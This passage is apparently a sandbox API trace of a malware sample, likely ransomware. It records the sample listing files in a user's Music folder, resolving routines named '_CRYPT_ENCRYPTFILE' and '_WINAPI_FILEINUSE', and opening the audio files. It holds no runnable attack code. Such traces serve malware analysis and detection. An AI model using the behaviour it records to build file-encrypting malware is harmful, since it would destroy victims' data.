dwReserved1=0x43ca6d0, cFileName=".", cAlternateFileName="")) returned 0x41ac280 [0113.517] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc2064c0, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x60f4f620, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x60f4f620, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca6d0, cFileName="..", cAlternateFileName="")) returned 1 [0113.517] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524dd610, ftCreationTime.dwHighDateTime=0x1d5ed5a, ftLastAccessTime.dwLowDateTime=0x867c25b0, ftLastAccessTime.dwHighDateTime=0x1d5e538, ftLastWriteTime.dwLowDateTime=0x867c25b0, ftLastWriteTime.dwHighDateTime=0x1d5e538, nFileSizeHigh=0x0, nFileSizeLow=0xc499, dwReserved0=0x0, dwReserved1=0x43ca6d0, cFileName="fKGiw.wav", cAlternateFileName="")) returned 1 [0113.517] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab951be0, ftCreationTime.dwHighDateTime=0x1d5eb73, ftLastAccessTime.dwLowDateTime=0xf77c4470, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0xf77c4470, ftLastWriteTime.dwHighDateTime=0x1d5ee48, nFileSizeHigh=0x0, nFileSizeLow=0x8156, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="WC8LUkBjI.mp3", cAlternateFileName="WC8LUK~1.MP3")) returned 1 [0113.517] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e26f0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x1a, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3570, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﶈмńဓ+\x10")) returned 0 [0113.518] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0113.518] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|fKGiw.wav|WC8LUkBjI.mp3", cchCount1=24, lpString2="", cchCount2=0) returned 3 [0113.518] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0113.518] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524dd610, ftCreationTime.dwHighDateTime=0x1d5ed5a, ftLastAccessTime.dwLowDateTime=0x867c25b0, ftLastAccessTime.dwHighDateTime=0x1d5e538, ftLastWriteTime.dwLowDateTime=0x867c25b0, ftLastWriteTime.dwHighDateTime=0x1d5e538, nFileSizeHigh=0x0, nFileSizeLow=0xc499, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="fKGiw.wav", cAlternateFileName="")) returned 0x41ac640 [0113.518] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0113.518] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0113.518] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0113.518] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0113.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca820, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0113.519] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\xavp\\fKGiw.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\xavp\\fkgiw.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0113.519] FreeLibrary (hLibModule=0x772d0000) returned 1 [0113.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9bf0 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0113.520] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0113.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0113.520] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0113.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0113.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0113.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0113.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0113.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0113.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0113.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0113.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0113.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0113.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0113.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.522] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0113.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0113.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0113.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca6e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0113.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.522] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0113.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0113.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0113.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0113.522] CloseHandle (hObject=0x298) returned 1 [0113.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0113.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.523] FreeLibrary (hLibModule=0x772d0000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0113.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.524] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0113.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0113.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0113.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0113.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0113.525] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0113.525] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0113.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0113.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0113.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0113.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0113.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0113.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0113.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0113.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0113.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0113.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0113.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0113.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0113.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0113.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0113.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) 